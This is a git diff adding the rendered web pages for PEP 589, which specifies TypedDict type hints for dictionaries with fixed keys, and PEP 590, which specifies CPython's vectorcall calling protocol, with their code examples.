+ + + + + \ No newline at end of file diff --git a/pep-0589/index.html b/pep-0589/index.html new file mode 100644 index 00000000000..717f3394f5a --- /dev/null +++ b/pep-0589/index.html @@ -0,0 +1,813 @@ + + + + + + + + PEP 589 – TypedDict: Type Hints for Dictionaries with a Fixed Set of Keys | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 589 – TypedDict: Type Hints for Dictionaries with a Fixed Set of Keys

+
+
Author:
+
Jukka Lehtosalo <jukka.lehtosalo at iki.fi>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
20-Mar-2019
+
Python-Version:
+
3.8
+
Post-History:
+

+
Resolution:
+
Typing-SIG message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see TypedDict and +typing.TypedDict for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

PEP 484 defines the type Dict[K, V] for uniform +dictionaries, where each value has the same type, and arbitrary key +values are supported. It doesn’t properly support the common pattern +where the type of a dictionary value depends on the string value of +the key. This PEP proposes a type constructor typing.TypedDict to +support the use case where a dictionary object has a specific set of +string keys, each with a value of a specific type.

+

Here is an example where PEP 484 doesn’t allow us to annotate +satisfactorily:

+
movie = {'name': 'Blade Runner',
+         'year': 1982}
+
+
+

This PEP proposes the addition of a new type constructor, called +TypedDict, to allow the type of movie to be represented +precisely:

+
from typing import TypedDict
+
+class Movie(TypedDict):
+    name: str
+    year: int
+
+
+

Now a type checker should accept this code:

+
movie: Movie = {'name': 'Blade Runner',
+                'year': 1982}
+
+
+
+
+

Motivation

+

Representing an object or structured data using (potentially nested) +dictionaries with string keys (instead of a user-defined class) is a +common pattern in Python programs. Representing JSON objects is +perhaps the canonical use case, and this is popular enough that Python +ships with a JSON library. This PEP proposes a way to allow such code +to be type checked more effectively.

+

More generally, representing pure data objects using only Python +primitive types such as dictionaries, strings and lists has had +certain appeal. They are easy to serialize and deserialize even +when not using JSON. They trivially support various useful operations +with no extra effort, including pretty-printing (through str() and +the pprint module), iteration, and equality comparisons.

+

PEP 484 doesn’t properly support the use cases mentioned above. Let’s +consider a dictionary object that has exactly two valid string keys, +'name' with value type str, and 'year' with value type +int. The PEP 484 type Dict[str, Any] would be suitable, but +it is too lenient, as arbitrary string keys can be used, and arbitrary +values are valid. Similarly, Dict[str, Union[str, int]] is too +general, as the value for key 'name' could be an int, and +arbitrary string keys are allowed. Also, the type of a subscription +expression such as d['name'] (assuming d to be a dictionary of +this type) would be Union[str, int], which is too wide.

+

Dataclasses are a more recent alternative to solve this use case, but +there is still a lot of existing code that was written before +dataclasses became available, especially in large existing codebases +where type hinting and checking has proven to be helpful. Unlike +dictionary objects, dataclasses don’t directly support JSON +serialization, though there is a third-party package that implements +it [1].

+
+
+

Specification

+

A TypedDict type represents dictionary objects with a specific set of +string keys, and with specific value types for each valid key. Each +string key can be either required (it must be present) or +non-required (it doesn’t need to exist).

+

This PEP proposes two ways of defining TypedDict types. The first uses +a class-based syntax. The second is an alternative +assignment-based syntax that is provided for backwards compatibility, +to allow the feature to be backported to older Python versions. The +rationale is similar to why PEP 484 supports a comment-based +annotation syntax for Python 2.7: type hinting is particularly useful +for large existing codebases, and these often need to run on older +Python versions. The two syntax options parallel the syntax variants +supported by typing.NamedTuple. Other proposed features include +TypedDict inheritance and totality (specifying whether keys are +required or not).

+

This PEP also provides a sketch of how a type checker is expected +to support type checking operations involving TypedDict objects. +Similar to PEP 484, this discussion is left somewhat vague on purpose, +to allow experimentation with a wide variety of different type +checking approaches. In particular, type compatibility should be +based on structural compatibility: a more specific TypedDict type can +be compatible with a smaller (more general) TypedDict type.

+
+

Class-based Syntax

+

A TypedDict type can be defined using the class definition syntax with +typing.TypedDict as the sole base class:

+
from typing import TypedDict
+
+class Movie(TypedDict):
+    name: str
+    year: int
+
+
+

Movie is a TypedDict type with two items: 'name' (with type +str) and 'year' (with type int).

+

A type checker should validate that the body of a class-based +TypedDict definition conforms to the following rules:

+
    +
  • The class body should only contain lines with item definitions of the +form key: value_type, optionally preceded by a docstring. The +syntax for item definitions is identical to attribute annotations, +but there must be no initializer, and the key name actually refers +to the string value of the key instead of an attribute name.
  • +
  • Type comments cannot be used with the class-based syntax, for +consistency with the class-based NamedTuple syntax. (Note that +it would not be sufficient to support type comments for backwards +compatibility with Python 2.7, since the class definition may have a +total keyword argument, as discussed below, and this isn’t valid +syntax in Python 2.7.) Instead, this PEP provides an alternative, +assignment-based syntax for backwards compatibility, discussed in +Alternative Syntax.
  • +
  • String literal forward references are valid in the value types.
  • +
  • Methods are not allowed, since the runtime type of a TypedDict +object will always be just dict (it is never a subclass of +dict).
  • +
  • Specifying a metaclass is not allowed.
  • +
+

An empty TypedDict can be created by only including pass in the +body (if there is a docstring, pass can be omitted):

+
class EmptyDict(TypedDict):
+    pass
+
+
+
+
+

Using TypedDict Types

+

Here is an example of how the type Movie can be used:

+
movie: Movie = {'name': 'Blade Runner',
+                'year': 1982}
+
+
+

An explicit Movie type annotation is generally needed, as +otherwise an ordinary dictionary type could be assumed by a type +checker, for backwards compatibility. When a type checker can infer +that a constructed dictionary object should be a TypedDict, an +explicit annotation can be omitted. A typical example is a dictionary +object as a function argument. In this example, a type checker is +expected to infer that the dictionary argument should be understood as +a TypedDict:

+
def record_movie(movie: Movie) -> None: ...
+
+record_movie({'name': 'Blade Runner', 'year': 1982})
+
+
+

Another example where a type checker should treat a dictionary display +as a TypedDict is in an assignment to a variable with a previously +declared TypedDict type:

+
movie: Movie
+...
+movie = {'name': 'Blade Runner', 'year': 1982}
+
+
+

Operations on movie can be checked by a static type checker:

+
movie['director'] = 'Ridley Scott'  # Error: invalid key 'director'
+movie['year'] = '1982'  # Error: invalid value type ("int" expected)
+
+
+

The code below should be rejected, since 'title' is not a valid +key, and the 'name' key is missing:

+
movie2: Movie = {'title': 'Blade Runner',
+                 'year': 1982}
+
+
+

The created TypedDict type object is not a real class object. Here +are the only uses of the type a type checker is expected to allow:

+
    +
  • It can be used in type annotations and in any context where an +arbitrary type hint is valid, such as in type aliases and as the +target type of a cast.
  • +
  • It can be used as a callable object with keyword arguments +corresponding to the TypedDict items. Non-keyword arguments are not +allowed. Example:
    m = Movie(name='Blade Runner', year=1982)
    +
    +
    +

    When called, the TypedDict type object returns an ordinary +dictionary object at runtime:

    +
    print(type(m))  # <class 'dict'>
    +
    +
    +
  • +
  • It can be used as a base class, but only when defining a derived +TypedDict. This is discussed in more detail below.
  • +
+

In particular, TypedDict type objects cannot be used in +isinstance() tests such as isinstance(d, Movie). The reason is +that there is no existing support for checking types of dictionary +item values, since isinstance() does not work with many PEP 484 +types, including common ones like List[str]. This would be needed +for cases like this:

+
class Strings(TypedDict):
+    items: List[str]
+
+print(isinstance({'items': [1]}, Strings))    # Should be False
+print(isinstance({'items': ['x']}, Strings))  # Should be True
+
+
+

The above use case is not supported. This is consistent with how +isinstance() is not supported for List[str].

+
+
+

Inheritance

+

It is possible for a TypedDict type to inherit from one or more +TypedDict types using the class-based syntax. In this case the +TypedDict base class should not be included. Example:

+
class BookBasedMovie(Movie):
+    based_on: str
+
+
+

Now BookBasedMovie has keys name, year, and based_on. +It is equivalent to this definition, since TypedDict types use +structural compatibility:

+
class BookBasedMovie(TypedDict):
+    name: str
+    year: int
+    based_on: str
+
+
+

Here is an example of multiple inheritance:

+
class X(TypedDict):
+    x: int
+
+class Y(TypedDict):
+    y: str
+
+class XYZ(X, Y):
+    z: bool
+
+
+

The TypedDict XYZ has three items: x (type int), y +(type str), and z (type bool).

+

A TypedDict cannot inherit from both a TypedDict type and a +non-TypedDict base class.

+

Additional notes on TypedDict class inheritance:

+
    +
  • Changing a field type of a parent TypedDict class in a subclass is not allowed. +Example:
    class X(TypedDict):
    +   x: str
    +
    +class Y(X):
    +   x: int  # Type check error: cannot overwrite TypedDict field "x"
    +
    +
    +

    In the example outlined above TypedDict class annotations returns +type str for key x:

    +
    print(Y.__annotations__)  # {'x': <class 'str'>}
    +
    +
    +
  • +
  • Multiple inheritance does not allow conflict types for the same name field:
    class X(TypedDict):
    +   x: int
    +
    +class Y(TypedDict):
    +   x: str
    +
    +class XYZ(X, Y):  # Type check error: cannot overwrite TypedDict field "x" while merging
    +   xyz: bool
    +
    +
    +
  • +
+
+
+

Totality

+

By default, all keys must be present in a TypedDict. It is possible +to override this by specifying totality. Here is how to do this +using the class-based syntax:

+
class Movie(TypedDict, total=False):
+    name: str
+    year: int
+
+
+

This means that a Movie TypedDict can have any of the keys omitted. Thus +these are valid:

+
m: Movie = {}
+m2: Movie = {'year': 2015}
+
+
+

A type checker is only expected to support a literal False or +True as the value of the total argument. True is the +default, and makes all items defined in the class body be required.

+

The totality flag only applies to items defined in the body of the +TypedDict definition. Inherited items won’t be affected, and instead +use totality of the TypedDict type where they were defined. This makes +it possible to have a combination of required and non-required keys in +a single TypedDict type.

+
+
+

Alternative Syntax

+

This PEP also proposes an alternative syntax that can be backported to +older Python versions such as 3.5 and 2.7 that don’t support the +variable definition syntax introduced in PEP 526. It +resembles the traditional syntax for defining named tuples:

+
Movie = TypedDict('Movie', {'name': str, 'year': int})
+
+
+

It is also possible to specify totality using the alternative syntax:

+
Movie = TypedDict('Movie',
+                  {'name': str, 'year': int},
+                  total=False)
+
+
+

The semantics are equivalent to the class-based syntax. This syntax +doesn’t support inheritance, however, and there is no way to +have both required and non-required fields in a single type. The +motivation for this is keeping the backwards compatible syntax as +simple as possible while covering the most common use cases.

+

A type checker is only expected to accept a dictionary display expression +as the second argument to TypedDict. In particular, a variable that +refers to a dictionary object does not need to be supported, to simplify +implementation.

+
+
+

Type Consistency

+

Informally speaking, type consistency is a generalization of the +is-subtype-of relation to support the Any type. It is defined +more formally in PEP 483. This section introduces the +new, non-trivial rules needed to support type consistency for +TypedDict types.

+

First, any TypedDict type is consistent with Mapping[str, object]. +Second, a TypedDict type A is consistent with TypedDict B if +A is structurally compatible with B. This is true if and only +if both of these conditions are satisfied:

+
    +
  • For each key in B, A has the corresponding key and the +corresponding value type in A is consistent with the value type +in B. For each key in B, the value type in B is also +consistent with the corresponding value type in A.
  • +
  • For each required key in B, the corresponding key is required +in A. For each non-required key in B, the corresponding key +is not required in A.
  • +
+

Discussion:

+
    +
  • Value types behave invariantly, since TypedDict objects are mutable. +This is similar to mutable container types such as List and +Dict. Example where this is relevant:
    class A(TypedDict):
    +    x: Optional[int]
    +
    +class B(TypedDict):
    +    x: int
    +
    +def f(a: A) -> None:
    +    a['x'] = None
    +
    +b: B = {'x': 0}
    +f(b)  # Type check error: 'B' not compatible with 'A'
    +b['x'] + 1  # Runtime error: None + 1
    +
    +
    +
  • +
  • A TypedDict type with a required key is not consistent with a +TypedDict type where the same key is a non-required key, since the +latter allows keys to be deleted. Example where this is relevant:
    class A(TypedDict, total=False):
    +    x: int
    +
    +class B(TypedDict):
    +    x: int
    +
    +def f(a: A) -> None:
    +    del a['x']
    +
    +b: B = {'x': 0}
    +f(b)  # Type check error: 'B' not compatible with 'A'
    +b['x'] + 1  # Runtime KeyError: 'x'
    +
    +
    +
  • +
  • A TypedDict type A with no key 'x' is not consistent with a +TypedDict type with a non-required key 'x', since at runtime +the key 'x' could be present and have an incompatible type +(which may not be visible through A due to structural subtyping). +Example:
    class A(TypedDict, total=False):
    +    x: int
    +    y: int
    +
    +class B(TypedDict, total=False):
    +    x: int
    +
    +class C(TypedDict, total=False):
    +    x: int
    +    y: str
    +
    + def f(a: A) -> None:
    +     a['y'] = 1
    +
    + def g(b: B) -> None:
    +     f(b)  # Type check error: 'B' incompatible with 'A'
    +
    + c: C = {'x': 0, 'y': 'foo'}
    + g(c)
    + c['y'] + 'bar'  # Runtime error: int + str
    +
    +
    +
  • +
  • A TypedDict isn’t consistent with any Dict[...] type, since +dictionary types allow destructive operations, including +clear(). They also allow arbitrary keys to be set, which +would compromise type safety. Example:
    class A(TypedDict):
    +    x: int
    +
    +class B(A):
    +    y: str
    +
    +def f(d: Dict[str, int]) -> None:
    +    d['y'] = 0
    +
    +def g(a: A) -> None:
    +    f(a)  # Type check error: 'A' incompatible with Dict[str, int]
    +
    +b: B = {'x': 0, 'y': 'foo'}
    +g(b)
    +b['y'] + 'bar'  # Runtime error: int + str
    +
    +
    +
  • +
  • A TypedDict with all int values is not consistent with +Mapping[str, int], since there may be additional non-int +values not visible through the type, due to structural subtyping. +These can be accessed using the values() and items() +methods in Mapping, for example. Example:
    class A(TypedDict):
    +    x: int
    +
    +class B(TypedDict):
    +    x: int
    +    y: str
    +
    +def sum_values(m: Mapping[str, int]) -> int:
    +    n = 0
    +    for v in m.values():
    +        n += v  # Runtime error
    +    return n
    +
    +def f(a: A) -> None:
    +    sum_values(a)  # Error: 'A' incompatible with Mapping[str, int]
    +
    +b: B = {'x': 0, 'y': 'foo'}
    +f(b)
    +
    +
    +
  • +
+
+
+

Supported and Unsupported Operations

+

Type checkers should support restricted forms of most dict +operations on TypedDict objects. The guiding principle is that +operations not involving Any types should be rejected by type +checkers if they may violate runtime type safety. Here are some of +the most important type safety violations to prevent:

+
    +
  1. A required key is missing.
  2. +
  3. A value has an invalid type.
  4. +
  5. A key that is not defined in the TypedDict type is added.
  6. +
+

A key that is not a literal should generally be rejected, since its +value is unknown during type checking, and thus can cause some of the +above violations. (Use of Final Values and Literal Types +generalizes this to cover final names and literal types.)

+

The use of a key that is not known to exist should be reported as an +error, even if this wouldn’t necessarily generate a runtime type +error. These are often mistakes, and these may insert values with an +invalid type if structural subtyping hides the types of certain items. +For example, d['x'] = 1 should generate a type check error if +'x' is not a valid key for d (which is assumed to be a +TypedDict type).

+

Extra keys included in TypedDict object construction should also be +caught. In this example, the director key is not defined in +Movie and is expected to generate an error from a type checker:

+
m: Movie = dict(
+    name='Alien',
+    year=1979,
+    director='Ridley Scott')  # error: Unexpected key 'director'
+
+
+

Type checkers should reject the following operations on TypedDict +objects as unsafe, even though they are valid for normal dictionaries:

+
    +
  • Operations with arbitrary str keys (instead of string literals +or other expressions with known string values) should generally be +rejected. This involves both destructive operations such as setting +an item and read-only operations such as subscription expressions. +As an exception to the above rule, d.get(e) and e in d +should be allowed for TypedDict objects, for an arbitrary expression +e with type str. The motivation is that these are safe and +can be useful for introspecting TypedDict objects. The static type +of d.get(e) should be object if the string value of e +cannot be determined statically.
  • +
  • clear() is not safe since it could remove required keys, some of +which may not be directly visible because of structural +subtyping. popitem() is similarly unsafe, even if all known +keys are not required (total=False).
  • +
  • del obj['key'] should be rejected unless 'key' is a +non-required key.
  • +
+

Type checkers may allow reading an item using d['x'] even if +the key 'x' is not required, instead of requiring the use of +d.get('x') or an explicit 'x' in d check. The rationale is +that tracking the existence of keys is difficult to implement in full +generality, and that disallowing this could require many changes to +existing code.

+

The exact type checking rules are up to each type checker to decide. +In some cases potentially unsafe operations may be accepted if the +alternative is to generate false positive errors for idiomatic code.

+
+
+

Use of Final Values and Literal Types

+

Type checkers should allow final names (PEP 591) with +string values to be used instead of string literals in operations on +TypedDict objects. For example, this is valid:

+
YEAR: Final = 'year'
+
+m: Movie = {'name': 'Alien', 'year': 1979}
+years_since_epoch = m[YEAR] - 1970
+
+
+

Similarly, an expression with a suitable literal type +(PEP 586) can be used instead of a literal value:

+
def get_value(movie: Movie,
+              key: Literal['year', 'name']) -> Union[int, str]:
+    return movie[key]
+
+
+

Type checkers are only expected to support actual string literals, not +final names or literal types, for specifying keys in a TypedDict type +definition. Also, only a boolean literal can be used to specify +totality in a TypedDict definition. The motivation for this is to +make type declarations self-contained, and to simplify the +implementation of type checkers.

+
+
+
+

Backwards Compatibility

+

To retain backwards compatibility, type checkers should not infer a +TypedDict type unless it is sufficiently clear that this is desired by +the programmer. When unsure, an ordinary dictionary type should be +inferred. Otherwise existing code that type checks without errors may +start generating errors once TypedDict support is added to the type +checker, since TypedDict types are more restrictive than dictionary +types. In particular, they aren’t subtypes of dictionary types.

+
+
+

Reference Implementation

+

The mypy [2] type checker supports TypedDict types. A reference +implementation of the runtime component is provided in the +typing_extensions [3] module. The original +implementation was in the mypy_extensions [4] +module.

+
+
+

Rejected Alternatives

+

Several proposed ideas were rejected. The current set of features +seem to cover a lot of ground, and it was not clear which of the +proposed extensions would be more than marginally useful. This PEP +defines a baseline feature that can be potentially extended later.

+

These are rejected on principle, as incompatible with the spirit of +this proposal:

+
    +
  • TypedDict isn’t extensible, and it addresses only a specific use +case. TypedDict objects are regular dictionaries at runtime, and +TypedDict cannot be used with other dictionary-like or mapping-like +classes, including subclasses of dict. There is no way to add +methods to TypedDict types. The motivation here is simplicity.
  • +
  • TypedDict type definitions could plausibly used to perform runtime +type checking of dictionaries. For example, they could be used to +validate that a JSON object conforms to the schema specified by a +TypedDict type. This PEP doesn’t include such functionality, since +the focus of this proposal is static type checking only, and other +existing types do not support this, as discussed in Class-based +syntax. Such functionality can be provided by a third-party +library using the typing_inspect [5] third-party +module, for example.
  • +
  • TypedDict types can’t be used in isinstance() or issubclass() +checks. The reasoning is similar to why runtime type checks aren’t +supported in general with many type hints.
  • +
+

These features were left out from this PEP, but they are potential +extensions to be added in the future:

+
    +
  • TypedDict doesn’t support providing a default value type for keys +that are not explicitly defined. This would allow arbitrary keys to +be used with a TypedDict object, and only explicitly enumerated keys +would receive special treatment compared to a normal, uniform +dictionary type.
  • +
  • There is no way to individually specify whether each key is required +or not. No proposed syntax was clear enough, and we expect that +there is limited need for this.
  • +
  • TypedDict can’t be used for specifying the type of a **kwargs +argument. This would allow restricting the allowed keyword +arguments and their types. According to PEP 484, using a TypedDict +type as the type of **kwargs means that the TypedDict is valid +as the value of arbitrary keyword arguments, but it doesn’t +restrict which keyword arguments should be allowed. The syntax +**kwargs: Expand[T] has been proposed for this [6].
  • +
+
+
+

Acknowledgements

+

David Foster contributed the initial implementation of TypedDict types +to mypy. Improvements to the implementation have been contributed by +at least the author (Jukka Lehtosalo), Ivan Levkivskyi, Gareth T, +Michael Lee, Dominik Miedzinski, Roy Williams and Max Moroz.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0589.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0590/index.html b/pep-0590/index.html new file mode 100644 index 00000000000..d3c708be3c1 --- /dev/null +++ b/pep-0590/index.html @@ -0,0 +1,464 @@ + + + + + + + + PEP 590 – Vectorcall: a fast calling protocol for CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 590 – Vectorcall: a fast calling protocol for CPython

+
+
Author:
+
Mark Shannon <mark at hotpy.org>, Jeroen Demeyer <J.Demeyer at UGent.be>
+
BDFL-Delegate:
+
Petr Viktorin <encukou at gmail.com>
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Created:
+
29-Mar-2019
+
Python-Version:
+
3.8
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at The Vectorcall Protocol.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP introduces a new C API to optimize calls of objects. +It introduces a new “vectorcall” protocol and calling convention. +This is based on the “fastcall” convention, which is already used internally by CPython. +The new features can be used by any user-defined extension class.

+

Most of the new API is private in CPython 3.8. +The plan is to finalize semantics and make it public in Python 3.9.

+

NOTE: This PEP deals only with the Python/C API, +it does not affect the Python language or standard library.

+
+
+

Motivation

+

The choice of a calling convention impacts the performance and flexibility of code on either side of the call. +Often there is tension between performance and flexibility.

+

The current tp_call [2] calling convention is sufficiently flexible to cover all cases, but its performance is poor. +The poor performance is largely a result of having to create intermediate tuples, and possibly intermediate dicts, during the call. +This is mitigated in CPython by including special-case code to speed up calls to Python and builtin functions. +Unfortunately, this means that other callables such as classes and third party extension objects are called using the +slower, more general tp_call calling convention.

+

This PEP proposes that the calling convention used internally for Python and builtin functions is generalized and published +so that all calls can benefit from better performance. +The new proposed calling convention is not fully general, but covers the large majority of calls. +It is designed to remove the overhead of temporary object creation and multiple indirections.

+

Another source of inefficiency in the tp_call convention is that it has one function pointer per class, +rather than per object. +This is inefficient for calls to classes as several intermediate objects need to be created. +For a class cls, at least one intermediate object is created for each call in the sequence +type.__call__, cls.__new__, cls.__init__.

+

This PEP proposes an interface for use by extension modules. +Such interfaces cannot effectively be tested, or designed, without having the +consumers in the loop. +For that reason, we provide private (underscore-prefixed) names. +The API may change (based on consumer feedback) in Python 3.9, where we expect +it to be finalized, and the underscores removed.

+
+
+

Specification

+
+

The function pointer type

+

Calls are made through a function pointer taking the following parameters:

+
    +
  • PyObject *callable: The called object
  • +
  • PyObject *const *args: A vector of arguments
  • +
  • size_t nargs: The number of arguments plus the optional flag PY_VECTORCALL_ARGUMENTS_OFFSET (see below)
  • +
  • PyObject *kwnames: Either NULL or a tuple with the names of the keyword arguments
  • +
+

This is implemented by the function pointer type: +typedef PyObject *(*vectorcallfunc)(PyObject *callable, PyObject *const *args, size_t nargs, PyObject *kwnames);

+
+
+

Changes to the PyTypeObject struct

+

The unused slot printfunc tp_print is replaced with tp_vectorcall_offset. It has the type Py_ssize_t. +A new tp_flags flag is added, _Py_TPFLAGS_HAVE_VECTORCALL, +which must be set for any class that uses the vectorcall protocol.

+

If _Py_TPFLAGS_HAVE_VECTORCALL is set, then tp_vectorcall_offset must be a positive integer. +It is the offset into the object of the vectorcall function pointer of type vectorcallfunc. +This pointer may be NULL, in which case the behavior is the same as if _Py_TPFLAGS_HAVE_VECTORCALL was not set.

+

The tp_print slot is reused as the tp_vectorcall_offset slot to make it easier for external projects to backport the vectorcall protocol to earlier Python versions. +In particular, the Cython project has shown interest in doing that (see https://mail.python.org/pipermail/python-dev/2018-June/153927.html).

+
+
+

Descriptor behavior

+

One additional type flag is specified: Py_TPFLAGS_METHOD_DESCRIPTOR.

+

Py_TPFLAGS_METHOD_DESCRIPTOR should be set if the callable uses the descriptor protocol to create a bound method-like object. +This is used by the interpreter to avoid creating temporary objects when calling methods +(see _PyObject_GetMethod and the LOAD_METHOD/CALL_METHOD opcodes).

+

Concretely, if Py_TPFLAGS_METHOD_DESCRIPTOR is set for type(func), then:

+
    +
  • func.__get__(obj, cls)(*args, **kwds) (with obj not None) +must be equivalent to func(obj, *args, **kwds).
  • +
  • func.__get__(None, cls)(*args, **kwds) must be equivalent to func(*args, **kwds).
  • +
+

There are no restrictions on the object func.__get__(obj, cls). +The latter is not required to implement the vectorcall protocol.

+
+
+

The call

+

The call takes the form ((vectorcallfunc)(((char *)o)+offset))(o, args, n, kwnames) where +offset is Py_TYPE(o)->tp_vectorcall_offset. +The caller is responsible for creating the kwnames tuple and ensuring that there are no duplicates in it.

+

n is the number of positional arguments plus possibly the PY_VECTORCALL_ARGUMENTS_OFFSET flag.

+
+
+

PY_VECTORCALL_ARGUMENTS_OFFSET

+

The flag PY_VECTORCALL_ARGUMENTS_OFFSET should be added to n +if the callee is allowed to temporarily change args[-1]. +In other words, this can be used if args points to argument 1 in the allocated vector. +The callee must restore the value of args[-1] before returning.

+

Whenever they can do so cheaply (without allocation), callers are encouraged to use PY_VECTORCALL_ARGUMENTS_OFFSET. +Doing so will allow callables such as bound methods to make their onward calls cheaply. +The bytecode interpreter already allocates space on the stack for the callable, +so it can use this trick at no additional cost.

+

See [3] for an example of how PY_VECTORCALL_ARGUMENTS_OFFSET is used by a callee to avoid allocation.

+

For getting the actual number of arguments from the parameter n, +the macro PyVectorcall_NARGS(n) must be used. +This allows for future changes or extensions.

+
+
+
+

New C API and changes to CPython

+

The following functions or macros are added to the C API:

+
    +
  • PyObject *_PyObject_Vectorcall(PyObject *obj, PyObject *const *args, size_t nargs, PyObject *keywords): +Calls obj with the given arguments. +Note that nargs may include the flag PY_VECTORCALL_ARGUMENTS_OFFSET. +The actual number of positional arguments is given by PyVectorcall_NARGS(nargs). +The argument keywords is a tuple of keyword names or NULL. +An empty tuple has the same effect as passing NULL. +This uses either the vectorcall protocol or tp_call internally; +if neither is supported, an exception is raised.
  • +
  • PyObject *PyVectorcall_Call(PyObject *obj, PyObject *tuple, PyObject *dict): +Call the object (which must support vectorcall) with the old +*args and **kwargs calling convention. +This is mostly meant to put in the tp_call slot.
  • +
  • Py_ssize_t PyVectorcall_NARGS(size_t nargs): Given a vectorcall nargs argument, +return the actual number of arguments. +Currently equivalent to nargs & ~PY_VECTORCALL_ARGUMENTS_OFFSET.
  • +
+
+

Subclassing

+

Extension types inherit the type flag _Py_TPFLAGS_HAVE_VECTORCALL +and the value tp_vectorcall_offset from the base class, +provided that they implement tp_call the same way as the base class. +Additionally, the flag Py_TPFLAGS_METHOD_DESCRIPTOR +is inherited if tp_descr_get is implemented the same way as the base class.

+

Heap types never inherit the vectorcall protocol because +that would not be safe (heap types can be changed dynamically). +This restriction may be lifted in the future, but that would require +special-casing __call__ in type.__setattribute__.

+
+
+
+

Finalizing the API

+

The underscore in the names _PyObject_Vectorcall and +_Py_TPFLAGS_HAVE_VECTORCALL indicates that this API may change in minor +Python versions. +When finalized (which is planned for Python 3.9), they will be renamed to +PyObject_Vectorcall and Py_TPFLAGS_HAVE_VECTORCALL. +The old underscore-prefixed names will remain available as aliases.

+

The new API will be documented as normal, but will warn of the above.

+

Semantics for the other names introduced in this PEP (PyVectorcall_NARGS, +PyVectorcall_Call, Py_TPFLAGS_METHOD_DESCRIPTOR, +PY_VECTORCALL_ARGUMENTS_OFFSET) are final.

+
+
+

Internal CPython changes

+
+

Changes to existing classes

+

The function, builtin_function_or_method, method_descriptor, method, wrapper_descriptor, method-wrapper +classes will use the vectorcall protocol +(not all of these will be changed in the initial implementation).

+

For builtin_function_or_method and method_descriptor +(which use the PyMethodDef data structure), +one could implement a specific vectorcall wrapper for every existing calling convention. +Whether or not it is worth doing that remains to be seen.

+
+
+

Using the vectorcall protocol for classes

+

For a class cls, creating a new instance using cls(xxx) +requires multiple calls. +At least one intermediate object is created for each call in the sequence +type.__call__, cls.__new__, cls.__init__. +So it makes a lot of sense to use vectorcall for calling classes. +This really means implementing the vectorcall protocol for type. +Some of the most commonly used classes will use this protocol, +probably range, list, str, and type.

+
+
+

The PyMethodDef protocol and Argument Clinic

+

Argument Clinic [4] automatically generates wrapper functions around lower-level callables, providing safe unboxing of primitive types and +other safety checks. +Argument Clinic could be extended to generate wrapper objects conforming to the new vectorcall protocol. +This will allow execution to flow from the caller to the Argument Clinic generated wrapper and +thence to the hand-written code with only a single indirection.

+
+
+
+

Third-party extension classes using vectorcall

+

To enable call performance on a par with Python functions and built-in functions, +third-party callables should include a vectorcallfunc function pointer, +set tp_vectorcall_offset to the correct value and add the _Py_TPFLAGS_HAVE_VECTORCALL flag. +Any class that does this must implement the tp_call function and make sure its behaviour is consistent with the vectorcallfunc function. +Setting tp_call to PyVectorcall_Call is sufficient.

+
+
+

Performance implications of these changes

+

This PEP should not have much impact on the performance of existing code +(neither in the positive nor the negative sense). +It is mainly meant to allow efficient new code to be written, +not to make existing code faster.

+

Nevertheless, this PEP optimizes for METH_FASTCALL functions. +Performance of functions using METH_VARARGS will become slightly worse.

+
+
+

Stable ABI

+

Nothing from this PEP is added to the stable ABI (PEP 384).

+
+
+

Alternative Suggestions

+
+

bpo-29259

+

PEP 590 is close to what was proposed in bpo-29259 [1]. +The main difference is that this PEP stores the function pointer +in the instance rather than in the class. +This makes more sense for implementing functions in C, +where every instance corresponds to a different C function. +It also allows optimizing type.__call__, which is not possible with bpo-29259.

+
+
+

PEP 576 and PEP 580

+

Both PEP 576 and PEP 580 are designed to enable 3rd party objects to be both expressive and performant (on a par with +CPython objects). The purpose of this PEP is provide a uniform way to call objects in the CPython ecosystem that is +both expressive and as performant as possible.

+

This PEP is broader in scope than PEP 576 and uses variable rather than fixed offset function-pointers. +The underlying calling convention is similar. Because PEP 576 only allows a fixed offset for the function pointer, +it would not allow the improvements to any objects with constraints on their layout.

+

PEP 580 proposes a major change to the PyMethodDef protocol used to define builtin functions. +This PEP provides a more general and simpler mechanism in the form of a new calling convention. +This PEP also extends the PyMethodDef protocol, but merely to formalise existing conventions.

+
+
+

Other rejected approaches

+

A longer, 6 argument, form combining both the vector and optional tuple and dictionary arguments was considered. +However, it was found that the code to convert between it and the old tp_call form was overly cumbersome and inefficient. +Also, since only 4 arguments are passed in registers on x64 Windows, the two extra arguments would have non-negligible costs.

+

Removing any special cases and making all calls use the tp_call form was also considered. +However, unless a much more efficient way was found to create and destroy tuples, and to a lesser extent dictionaries, +then it would be too slow.

+
+
+
+

Acknowledgements

+

Victor Stinner for developing the original “fastcall” calling convention internally to CPython. +This PEP codifies and extends his work.

+
+
+

References

+ +
+
+

Reference implementation

+

A minimal implementation can be found at https://github.com/markshannon/cpython/tree/vectorcall-minimal

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0590.rst

+

Last modified: 2024-06-01 20:09:32 GMT

+ +
+ +
